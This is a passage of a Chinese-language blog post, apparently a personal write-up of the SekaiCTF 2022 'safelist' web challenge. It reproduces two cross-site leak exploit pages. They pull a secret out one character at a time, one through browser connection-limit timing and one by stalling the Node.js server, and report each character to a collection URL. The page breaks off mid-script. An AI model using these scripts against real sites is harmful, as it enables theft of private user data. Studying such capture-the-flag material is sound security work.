<!DOCTYPE html>
<html lang="en">

  <head>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1" />
  
  <meta name="keywords" content="Siebene@ Blog">
  
  <meta name="author" content="Siebene@" />
  <meta name="description" content="Siebene@ Blog" />

  <link rel="apple-touch-icon" href="/images/favicon.png">
  <link rel="icon" href="/images/favicon.png">


  
    <!-- Global site tag (gtag.js) - Google Analytics -->
    <script async src="https://www.googletagmanager.com/gtag/js?id=G-4Q88Z8JZE6"></script>
    <script>
      window.dataLayer = window.dataLayer || [];
      function gtag(){dataLayer.push(arguments);}
      gtag('js', new Date());
    
      gtag('config', 'G-4Q88Z8JZE6');
    </script>
  


    <style>
      .lazyload {
        background-image: none !important;
      }
    </style>
    <link
      rel="stylesheet"
      id="bones-stylesheet-css"
      href="/css/style.css"
      type="text/css"
      media="all"/>
    <link
      rel="stylesheet"
      id="Roboto-css"
      href="//fonts.googleapis.com/css2?family=Roboto%3Aital%2Cwght%400%2C400%3B0%2C700%3B0%2C900%3B1%2C400%3B1%2C700%3B1%2C900&#038;display=swap"
      type="text/css"
      media="all"/>

    <link rel="stylesheet" href="/css/main.css" />
    <link rel="stylesheet" href="//at.alicdn.com/t/font_1886449_67xjft27j1l.css" />
    <script type="text/javascript">
      /* <![CDATA[ */
      var eio_lazy_vars = { exactdn_domain: "", skip_autoscale: "0" };
      /* ]]> */
    </script>
    <script
      type="text/javascript"
      src="/js/lazysizes.min.js">
    </script>
    <script
      type="text/javascript"
      src="/js/modernizr.custom.min.js">
    </script>
    <script
      type="text/javascript"
      src="/js/jquery.js">
    </script>
    <script
      type="text/javascript"
      src="/js/jquery-migrate.min.js">
    </script>
<meta name="generator" content="Hexo 6.2.0"></head>

  <body class="archive post-type-archive post-type-archive-post" itemscope itemtype="http://schema.org/WebPage">
    <!-- 文章详情页，展示文章具体内容，url形式：https://yoursite/文章标题/ -->
<!-- 同时为「标签tag」，「朋友friend」，「分类categories」，「关于about」页面的承载页面，具体展示取决于page.type -->


  <!-- LaTex Display -->

  
    <script async type="text/javascript" src="/js/mathjax/tex-chtml.js"></script>
  
  <script>
    MathJax = {
      tex: {
        inlineMath: [['$', '$'], ['\\(', '\\)']]
      }
    }
  </script>









  <!-- 文章内容页 url形式：https://yoursite/文章标题/ -->
  <div id="container" class="lazyload">
    <header
      class="header"
      role="banner"
      itemscope
      itemtype="http://schema.org/WPHeader">
      <div id="inner-header" class="wrap cf lazyload">
        <div
          id="logo"
          class="h1 lazyload"
          itemscope
          itemtype="http://schema.org/Organization">
          <a href="/" rel="nofollow">
            <img
            src="data:image/gif;base64,R0lGODlhAQABAAAAACH5BAEKAAEALAAAAAABAAEAAAICTAEAOw=="
            alt="Siebene@ Blog"
            data-src="/images/logo-head.png"
            class="lazyload"
            />
          </a>
        </div>

        <div id="drawer_box" class="lazyload">
  <nav
    id="main_navi"
    role="navigation"
    itemscope
    itemtype="http://schema.org/SiteNavigationElement">
    <ul id="menu-main_navi" class="nav top-nav cf">
      <li
        id="menu-item"
        class="menu-item menu-item-type-custom menu-item-object-custom">
        <a href="/">Home</a>
      </li>
      <li
        id="menu-item"
        class="menu-item menu-item-type-custom menu-item-object-custom">
        <a href="/about">About</a>
      </li>
    </ul>
  </nav>
  <!-- <ul class="language_btn nav">
    <li><a href="#ja" class="selected">JA</a></li>
    <li><a href="#en">EN</a></li>
  </ul> -->

  <ul class="sns_list nav">
    <li>
      <a href="https://twitter.com/Siebene7" target="_blank"><i class="fab fa-twitter"></i></a>
    </li>
  </ul>
</div>

        <p class="triggerBtn">
          <a href="#" id="menuTrigger">
            <span></span>
            <span></span>
            <span></span>
          </a>
        </p>
      </div>
    </header>

    <div id="content" class="lazyload">
      <div id="inner-content" class="wrap cf lazyload">
        <main
          id="main"
          class="cf"
          role="main"
          itemscope
          itemprop="mainContentOfPage"
          itemtype="http://schema.org/Blog">
          <article
            id="post"
            class="cf post type-post status-publish format-standard has-post-thumbnail hentry category-release"
            role="article"
            itemscope
            itemprop="blogPost"
            itemtype="http://schema.org/BlogPosting">
            <header class="article-header entry-header">
              <div
                class="glitcharea glitcharea_single lazyload"
                style="background-image: url('/2022/10/08/SekaiCTF2022-WriteUps/cover.png');"
                data-bg="/2022/10/08/SekaiCTF2022-WriteUps/cover.png">
                <img
                  width="680"
                  height="680"
                  src="/images/placeholder-1024x1024.png"
                  class="glitchImg wp-post-image lazyload"
                  alt=""
                  data-src="/2022/10/08/SekaiCTF2022-WriteUps/cover.png"
                  loading="lazy"
                  data-srcset="/2022/10/08/SekaiCTF2022-WriteUps/cover.png"
                  data-sizes="auto"
                />
              </div>
              <div class="txt_area lazyload">
                <img
                  width="680"
                  height="680"
                  src="/images/placeholder-1024x1024.png"
                  class="backimg wp-post-image lazyload"
                  alt=""
                  data-src="/2022/10/08/SekaiCTF2022-WriteUps/cover.png"
                  loading="lazy"
                  data-srcset="/2022/10/08/SekaiCTF2022-WriteUps/cover.png"
                  data-sizes="auto"
                />
                <div class="meta meta_single lazyload">
                  <ul class="post-categories">
                    
                      <li>
                        <a
                          href="/tags/WP/"
                          rel="category tag">WP
                        </a>
                      </li>
                      
                  </ul>
                  <time
                    class="updated entry-time"
                    datetime="2022-10-08"
                    itemprop="datePublished">
                    2022-10-08
                  </time>
                </div>
                <h1
                  class="entry-title single-title"
                  itemprop="headline"
                  rel="bookmark">
                  SekaiCTF2022-WriteUps
                </h1>
              </div>
            </header>
            <section class="markdown-body" itemprop="articleBody">
              <h3 id="Intro"><a href="#Intro" class="headerlink" title="Intro"></a>Intro</h3><p>有些东西不想存电脑里，感觉很杂乱，但是删了又拍不好找，乾脆放博客好了，仅仅是方便自己后面来看某些东西，防止忘记又去找半天浪费时间</p>
<p>推荐看官方wp就好了</p>
<p><a target="_blank" rel="noopener" href="https://brycec.me/posts/sekaictf_2022_challenges">https://brycec.me/posts/sekaictf_2022_challenges</a></p>
<h3 id="safelist-复现-amp-amp-笔记"><a href="#safelist-复现-amp-amp-笔记" class="headerlink" title="safelist 复现&amp;&amp;笔记"></a>safelist 复现&amp;&amp;笔记</h3><p>这道题的csp规则很严格，简单总结就是</p>
<ul>
<li>Cache-Control: no-store(禁用了缓存探测的做法)</li>
<li>Cross-Origin-Opener-Policy: same-origin(只能open这道题的这个windows，其他操作干不了)</li>
<li>Document-Policy: force-load-at-top(禁止scroll-to-text-fragment跟#)</li>
<li>Cross-Origin-Resource-Policy: same-origin(其他网站不能加载这道题的资源)</li>
</ul>
<p>还好有一个<code>DOMPurify</code>限制下的<code>html inejction</code>,DOMPurify有什么限制就不细说，本地记得比较详细</p>
<p>配合题目创建笔记就会按照字母顺序排序的功能，想办法通过时间检测我们<code>html inejction</code>注入的内容在<code>flag</code>上面还是下面就行了</p>
<h5 id="Timing-6-concurrent-request"><a href="#Timing-6-concurrent-request" class="headerlink" title="Timing-6 concurrent request"></a>Timing-6 concurrent request</h5><p>引用下别人的<a target="_blank" rel="noopener" href="https://blog.huli.tw/2022/10/08/sekaictf2022-safelist-and-connection/#more">博客</a>，方便随时复习</p>
<blockquote>
<p>「每個分頁都共用同一個限制」，意思是傳說中的「6 concurrent request」是針對目的地，而不是像我前面所認知的，每個頁面都有自己的 pool</p>
<p>根據最後測的結果，我總結出一共有兩個 pool</p>
<ol>
<li>其他 host 對於 target host 的 fetch</li>
<li>自己對自己的 fetch &amp; script&#x2F;img 的載入(这里是指可以是其他host的?)</li>
</ol>
</blockquote>
<p>脚本来源:<a target="_blank" rel="noopener" href="https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e">https://gist.github.com/terjanq/0bc49a8ef52b0e896fca1ceb6ca6b00e</a></p>
<p>我在本地尝试的时候发现，只需要调下sleep的时间还有就是最后判断oracle是否成功的时间（因为是在本地测的嘛，网络波动不大）</p>
<p>为了方便以后快速回忆起来，我写了点中文注释</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">head</span>&gt;</span></span><br><span class="line">        <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">const</span> <span class="variable constant_">SITE_URL</span> = <span class="string">&#x27;http://127.0.0.1:1234/&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">const</span> <span class="variable constant_">PING_URL</span> = <span class="string">&#x27;http://127.0.0.1/&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">function</span> <span class="title function_">timeScript</span>(<span class="params"></span>)&#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">Promise</span>(<span class="function"><span class="params">resolve</span> =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">var</span> x = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;script&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">                    x.<span class="property">src</span> = <span class="string">&#x27;http://127.0.0.1:1234/js/purify.js?&#x27;</span> + <span class="title class_">Math</span>.<span class="title function_">random</span>();</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">var</span> start = <span class="title class_">Date</span>.<span class="title function_">now</span>();</span></span><br><span class="line"><span class="language-javascript">                    x.<span class="property">onerror</span> = <span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">                        <span class="variable language_">console</span>.<span class="title function_">log</span>(<span class="string">`Time: <span class="subst">$&#123;<span class="built_in">Date</span>.now() - start&#125;</span>`</span>);</span></span><br><span class="line"><span class="language-javascript">                        <span class="title function_">resolve</span>(<span class="title class_">Date</span>.<span class="title function_">now</span>() - start);</span></span><br><span class="line"><span class="language-javascript">                        x.<span class="title function_">remove</span>();</span></span><br><span class="line"><span class="language-javascript">                    &#125;</span></span><br><span class="line"><span class="language-javascript">                    <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(x);</span></span><br><span class="line"><span class="language-javascript">                &#125;);</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">            add_note = <span class="keyword">async</span> (note) =&gt; &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">let</span> x = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;form&#x27;</span>)</span></span><br><span class="line"><span class="language-javascript">                x.<span class="property">action</span> = <span class="variable constant_">SITE_URL</span> + <span class="string">&quot;create&quot;</span></span></span><br><span class="line"><span class="language-javascript">                x.<span class="property">method</span> = <span class="string">&quot;POST&quot;</span></span></span><br><span class="line"><span class="language-javascript">                x.<span class="property">target</span> = <span class="string">&quot;xxx&quot;</span></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">let</span> i = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;input&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                i.<span class="property">type</span> = <span class="string">&quot;text&quot;</span></span></span><br><span class="line"><span class="language-javascript">                i.<span class="property">name</span> = <span class="string">&quot;text&quot;</span></span></span><br><span class="line"><span class="language-javascript">                i.<span class="property">value</span> = note</span></span><br><span class="line"><span class="language-javascript">                x.<span class="title function_">appendChild</span>(i)</span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(x)</span></span><br><span class="line"><span class="language-javascript">                x.<span class="title function_">submit</span>()</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            </span></span><br><span class="line"><span class="language-javascript">            remove_note = <span class="keyword">async</span> (note_id) =&gt; &#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">let</span> x = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&#x27;form&#x27;</span>)</span></span><br><span class="line"><span class="language-javascript">                x.<span class="property">action</span> = <span class="variable constant_">SITE_URL</span>+<span class="string">&quot;remove&quot;</span></span></span><br><span class="line"><span class="language-javascript">                x.<span class="property">method</span> = <span class="string">&quot;POST&quot;</span></span></span><br><span class="line"><span class="language-javascript">                x.<span class="property">target</span> = <span class="string">&quot;_blank&quot;</span></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">let</span> i = <span class="variable language_">document</span>.<span class="title function_">createElement</span>(<span class="string">&quot;input&quot;</span>);</span></span><br><span class="line"><span class="language-javascript">                i.<span class="property">type</span> = <span class="string">&quot;text&quot;</span></span></span><br><span class="line"><span class="language-javascript">                i.<span class="property">name</span> = <span class="string">&quot;index&quot;</span></span></span><br><span class="line"><span class="language-javascript">                i.<span class="property">value</span> = note_id</span></span><br><span class="line"><span class="language-javascript">                x.<span class="title function_">appendChild</span>(i)</span></span><br><span class="line"><span class="language-javascript">                <span class="variable language_">document</span>.<span class="property">body</span>.<span class="title function_">appendChild</span>(x)</span></span><br><span class="line"><span class="language-javascript">                x.<span class="title function_">submit</span>()</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            </span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">const</span> <span class="title function_">sleep</span> = ms =&gt; <span class="keyword">new</span> <span class="title class_">Promise</span>(<span class="function"><span class="params">resolve</span> =&gt;</span> <span class="built_in">setTimeout</span>(resolve, ms));</span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// &#125;zyxwvutsrqponmlkjihgfedcba_</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">const</span> alphabet = <span class="string">&#x27;zyxwvutsrqponmlkjihgfedcba_&#x27;</span></span></span><br><span class="line"><span class="language-javascript">            <span class="comment">// const alphabet = &#x27;zxa&#x27;</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">var</span> prefix = <span class="string">&#x27;SEKAI&#123;te&#x27;</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">const</span> <span class="variable constant_">TIMEOUT</span> = <span class="number">500</span>;</span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">checkLetter</span>(<span class="params">letter</span>)&#123;</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Chrome puts a limit of 6 concurrent request to the same origin. We are creating a lot of images pointing to purify.js</span></span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// Depending whether we found flag&#x27;s letter it will either load the images or not.</span></span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// With timing, we can detect whether Chrome is processing purify.js or not from our site and hence leak the flag char by char.</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">const</span> payload = <span class="string">`<span class="subst">$&#123;prefix&#125;</span><span class="subst">$&#123;letter&#125;</span>`</span> + <span class="title class_">Array</span>.<span class="title function_">from</span>(<span class="title class_">Array</span>(<span class="number">1000</span>)).<span class="title function_">map</span>(<span class="function">(<span class="params">e,i</span>)=&gt;</span><span class="string">`&lt;img/src=/js/purify.js?<span class="subst">$&#123;i&#125;</span>&gt;`</span>).<span class="title function_">join</span>(<span class="string">&#x27;&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">await</span> <span class="title function_">add_note</span>(payload);</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">await</span> <span class="title function_">sleep</span>(<span class="variable constant_">TIMEOUT</span>);</span></span><br><span class="line"><span class="language-javascript">                first = <span class="keyword">await</span> <span class="title function_">timeScript</span>();<span class="comment">//使用timeScript()保证已经加载完成</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">await</span> <span class="title function_">remove_note</span>(<span class="number">1</span>);<span class="comment">//因为是提交的表单并打开新标签页，所以这里如果你添加的一堆img标签没有消失的话，就会开始占用上面所说的第二种pool</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">await</span> <span class="title function_">sleep</span>(<span class="number">100</span>);<span class="comment">//等待的时间需要调整，如果时间太长，img标签加载完后，占用的资源也就释放了</span></span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">const</span> time = <span class="keyword">await</span> <span class="title function_">timeScript</span>();</span></span><br><span class="line"><span class="language-javascript">                navigator.<span class="title function_">sendBeacon</span>(<span class="variable constant_">PING_URL</span>+[letter,time],<span class="string">&#x27;&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">if</span>(time&gt;=<span class="number">8</span>)&#123;</span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">return</span> <span class="number">1</span>;</span></span><br><span class="line"><span class="language-javascript">                &#125;</span></span><br><span class="line"><span class="language-javascript">                <span class="keyword">return</span> <span class="number">0</span>;</span></span><br><span class="line"><span class="language-javascript">            &#125;</span></span><br><span class="line"><span class="language-javascript">            <span class="variable language_">window</span>.<span class="property">onload</span> = <span class="keyword">async</span> () =&gt; &#123;</span></span><br><span class="line"><span class="language-javascript">                navigator.<span class="title function_">sendBeacon</span>(<span class="variable constant_">PING_URL</span>, <span class="string">&#x27;start&#x27;</span>);</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// doesnt work because we are removing flag after success.</span></span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// while(1)&#123;</span></span></span><br><span class="line"><span class="language-javascript">                    <span class="keyword">for</span>(<span class="keyword">const</span> letter <span class="keyword">of</span> alphabet)&#123;</span></span><br><span class="line"><span class="language-javascript">                        <span class="keyword">if</span>(<span class="keyword">await</span> <span class="title function_">checkLetter</span>(letter))&#123;</span></span><br><span class="line"><span class="language-javascript">                            prefix += letter;</span></span><br><span class="line"><span class="language-javascript">                            navigator.<span class="title function_">sendBeacon</span>(<span class="variable constant_">PING_URL</span>+<span class="string">&#x27;?data=&#x27;</span>+prefix);</span></span><br><span class="line"><span class="language-javascript">                            <span class="keyword">break</span>;</span></span><br><span class="line"><span class="language-javascript">                        &#125;</span></span><br><span class="line"><span class="language-javascript">                    &#125;</span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// &#125;</span></span></span><br><span class="line"><span class="language-javascript">                <span class="comment">// 注释掉while,我这里改成每跑一次leak一个字元</span></span></span><br><span class="line"><span class="language-javascript">                </span></span><br><span class="line"><span class="language-javascript">            &#125;;            </span></span><br><span class="line"><span class="language-javascript">        </span><span class="tag">&lt;/<span class="name">script</span>&gt;</span>            </span><br><span class="line">    <span class="tag">&lt;/<span class="name">head</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">        </span><br><span class="line"></span><br><span class="line">    <span class="tag">&lt;/<span class="name">body</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">html</span>&gt;</span></span><br></pre></td></tr></table></figure>

<h5 id="Timing-ddos-nodejs-server"><a href="#Timing-ddos-nodejs-server" class="headerlink" title="Timing-ddos-nodejs-server"></a>Timing-ddos-nodejs-server</h5><p>脚本来源:<a target="_blank" rel="noopener" href="https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/">https://blog.huli.tw/2022/10/05/en/sekaictf2022-safelist-xsleak/</a></p>
<p>由于nodejs是单线程嘛，当构造的内容发送大量请求卡住主线程，再在本地就能观测到卡住了很长一段时间</p>
<p>同上，本地测试时间需要改变下，写了些中文注释，简单改了下二分</p>
<figure class="highlight html"><table><tr><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">html</span>&gt;</span></span><br><span class="line"><span class="comment">&lt;!--</span></span><br><span class="line"><span class="comment">  The basic idea is to create a post with a lot of images which send request to &quot;/&quot; to block server-side nodejs main thread.</span></span><br><span class="line"><span class="comment">  If images are loading, the request to &quot;/&quot; is slower, otherwise faster.</span></span><br><span class="line"><span class="comment">  By using a well-crafted height, we can let note with &quot;A&quot; load image but note with &quot;Z&quot; not load.</span></span><br><span class="line"><span class="comment">  We can use fetch to measure the request time.</span></span><br><span class="line"><span class="comment">--&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">body</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">button</span> <span class="attr">onclick</span>=<span class="string">&quot;run()&quot;</span>&gt;</span>start<span class="tag">&lt;/<span class="name">button</span>&gt;</span></span><br><span class="line"></span><br><span class="line">  <span class="tag">&lt;<span class="name">form</span> <span class="attr">id</span>=<span class="string">f</span> <span class="attr">action</span>=<span class="string">&quot;http://127.0.0.1:1234/create&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span> <span class="attr">target</span>=<span class="string">&quot;_blank&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">inp</span> <span class="attr">name</span>=<span class="string">&quot;text&quot;</span> <span class="attr">value</span>=<span class="string">&quot;&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line"></span><br><span class="line">  <span class="tag">&lt;<span class="name">form</span> <span class="attr">id</span>=<span class="string">f2</span> <span class="attr">action</span>=<span class="string">&quot;http://127.0.0.1:1234/remove&quot;</span> <span class="attr">method</span>=<span class="string">&quot;POST&quot;</span> <span class="attr">target</span>=<span class="string">&quot;_blank&quot;</span>&gt;</span></span><br><span class="line">    <span class="tag">&lt;<span class="name">input</span> <span class="attr">id</span>=<span class="string">inp2</span> <span class="attr">name</span>=<span class="string">&quot;index&quot;</span> <span class="attr">value</span>=<span class="string">&quot;&quot;</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;/<span class="name">form</span>&gt;</span></span><br><span class="line">  <span class="tag">&lt;<span class="name">script</span>&gt;</span><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">let</span> flag = <span class="string">&#x27;SEKAI&#123;&#x27;</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">const</span> <span class="variable constant_">TARGET</span> = <span class="string">&#x27;http://127.0.0.1:1234&#x27;</span></span></span><br><span class="line"><span class="language-javascript">    f.<span class="property">action</span> = <span class="variable constant_">TARGET</span> + <span class="string">&#x27;/create&#x27;</span></span></span><br><span class="line"><span class="language-javascript">    f2.<span class="property">action</span> = <span class="variable constant_">TARGET</span> + <span class="string">&#x27;/remove&#x27;</span></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">const</span> <span class="title function_">sleep</span> = ms =&gt; <span class="keyword">new</span> <span class="title class_">Promise</span>(<span class="function"><span class="params">r</span> =&gt;</span> <span class="built_in">setTimeout</span>(r, ms))</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">const</span> <span class="title function_">send</span> = data =&gt; <span class="title function_">fetch</span>(<span class="string">&#x27;http://127.0.0.1?d=&#x27;</span>+data)</span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">const</span> charset = <span class="string">&#x27;abcdefghijklmnopqrstuvwxyz&#x27;</span>.<span class="title function_">split</span>(<span class="string">&#x27;&#x27;</span>)</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// start exploit</span></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">let</span> count = <span class="number">0</span></span></span><br><span class="line"><span class="language-javascript">    <span class="built_in">setTimeout</span>(<span class="keyword">async</span> () =&gt; &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">for</span>(<span class="keyword">let</span> i=<span class="number">1</span>;i&lt;=<span class="number">9</span>;i++)&#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">let</span> L = <span class="number">0</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">let</span> R = charset.<span class="property">length</span> - <span class="number">1</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">let</span> M = <span class="number">0</span></span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">while</span>( L &lt;= R ) &#123;</span></span><br><span class="line"><span class="language-javascript">          M = L + ((R - L)&gt;&gt;<span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">          <span class="keyword">let</span> c = charset[M]</span></span><br><span class="line"><span class="language-javascript">          <span class="title function_">send</span>(<span class="string">&#x27;try_&#x27;</span> + flag + c + <span class="string">&#x27; L: &#x27;</span> + L + <span class="string">&#x27; R: &#x27;</span> + R)</span></span><br><span class="line"><span class="language-javascript">          <span class="keyword">const</span> found = <span class="keyword">await</span> <span class="title function_">testChar</span>(flag + c)</span></span><br><span class="line"><span class="language-javascript">          <span class="keyword">if</span> (found) &#123;</span></span><br><span class="line"><span class="language-javascript">            L = M + <span class="number">1</span></span></span><br><span class="line"><span class="language-javascript">          &#125; <span class="keyword">else</span> &#123;</span></span><br><span class="line"><span class="language-javascript">            R = M</span></span><br><span class="line"><span class="language-javascript">          &#125;</span></span><br><span class="line"><span class="language-javascript">          <span class="keyword">if</span> (L==R)&#123;<span class="comment">//有时候二分需要注意下这个</span></span></span><br><span class="line"><span class="language-javascript">            M = R-<span class="number">1</span></span></span><br><span class="line"><span class="language-javascript">            <span class="keyword">break</span></span></span><br><span class="line"><span class="language-javascript">          &#125;</span></span><br><span class="line"><span class="language-javascript">          </span></span><br><span class="line"><span class="language-javascript">        &#125;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">if</span>(M == <span class="number">0</span> || M == charset.<span class="property">length</span> - <span class="number">1</span>)</span></span><br><span class="line"><span class="language-javascript">          <span class="keyword">break</span></span></span><br><span class="line"><span class="language-javascript">        flag += charset[M]</span></span><br><span class="line"><span class="language-javascript">        <span class="title function_">send</span>(<span class="string">&#x27;found: &#x27;</span>+ flag)</span></span><br><span class="line"><span class="language-javascript">      &#125;      </span></span><br><span class="line"><span class="language-javascript">    &#125;, <span class="number">0</span>)</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">testChar</span>(<span class="params">str</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">return</span> <span class="keyword">new</span> <span class="title class_">Promise</span>(<span class="function"><span class="params">resolve</span> =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">          <span class="comment">/*</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">            For 3350, you need to test it on your local to get this number.</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">            The basic idea is, if your post starts with &quot;Z&quot;, the image should not be loaded because it&#x27;s under lazy loading threshold</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">            If starts with &quot;A&quot;, the image should be loaded because it&#x27;s in the threshold.</span></span></span><br><span class="line"><span class="comment"><span class="language-javascript">          */</span></span></span><br><span class="line"><span class="language-javascript">          <span class="comment">//1700px</span></span></span><br><span class="line"><span class="language-javascript">          inp.<span class="property">value</span> = str + <span class="string">&#x27;&lt;br&gt;&lt;canvas height=&quot;3350px&quot;&gt;&lt;/canvas&gt;&lt;br&gt;&#x27;</span>+<span class="title class_">Array</span>.<span class="title function_">from</span>(&#123;<span class="attr">length</span>:<span class="number">900</span>&#125;).<span class="title function_">map</span>(<span class="function">(<span class="params">_,i</span>)=&gt;</span><span class="string">`&lt;img loading=lazy src=/?<span class="subst">$&#123;i&#125;</span>&gt;`</span>).<span class="title function_">join</span>(<span class="string">&#x27;&#x27;</span>)</span></span><br><span class="line"><span class="language-javascript">          f.<span class="title function_">submit</span>()</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">          <span class="built_in">setTimeout</span>(<span class="function">() =&gt;</span> &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="title function_">run</span>(str, resolve)</span></span><br><span class="line"><span class="language-javascript">          &#125;, <span class="number">100</span>)</span></span><br><span class="line"><span class="language-javascript">      &#125;)</span></span><br><span class="line"><span class="language-javascript">    &#125;</span></span><br><span class="line"><span class="language-javascript"></span></span><br><span class="line"><span class="language-javascript">    <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">run</span>(<span class="params">str, resolve</span>) &#123;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">// if the request is not enough, we can send more by opening more window</span></span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">for</span>(<span class="keyword">let</span> i=<span class="number">1</span>; i&lt;=<span class="number">5</span>;i++) &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="variable language_">window</span>.<span class="title function_">open</span>(<span class="variable constant_">TARGET</span>)</span></span><br><span class="line"><span class="language-javascript">      &#125;</span></span><br><span class="line"><span class="language-javascript">    <span class="comment">//这步也比较聪明，之前我还在想输入的长度是有限制的，那么点图片怕是卡不住，后来看到这里才意识到自己反应确实慢了  </span></span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">let</span> t = <span class="number">0</span></span></span><br><span class="line"><span class="language-javascript">      <span class="keyword">const</span> round = <span class="number">30</span></span></span><br><span class="line"><span class="language-javascript">      <span class="built_in">setTimeout</span>(<span class="keyword">async</span> () =&gt; &#123;</span></span><br><span class="line"><span class="language-javascript">        <span class="keyword">for</span>(<span class="keyword">let</span> i=<span class="number">0</span>; i&lt;round; i++) &#123;</span></span><br><span class="line"><span class="language-javascript">          <span class="keyword">let</span> s = performance.<span class="title function_">now</span>()</span></span><br><span class="line"><span class="language-javascript">          <span class="keyword">await</span> <span class="title function_">fetch</span>(<span class="variable constant_">TARGET</span> + <span class="string">&#x27;/?test&#x27;</span>, &#123;</span></span><br><span class="line"><span class="language-javascript">            <span class="attr">mode</span>: <span class="string">&#x27;no-cors&#x27;</span></span></span><br><span class="line"><span class="language-javascript">          &#125;).<span class="title function_">catch</span>(<span class="function"><span 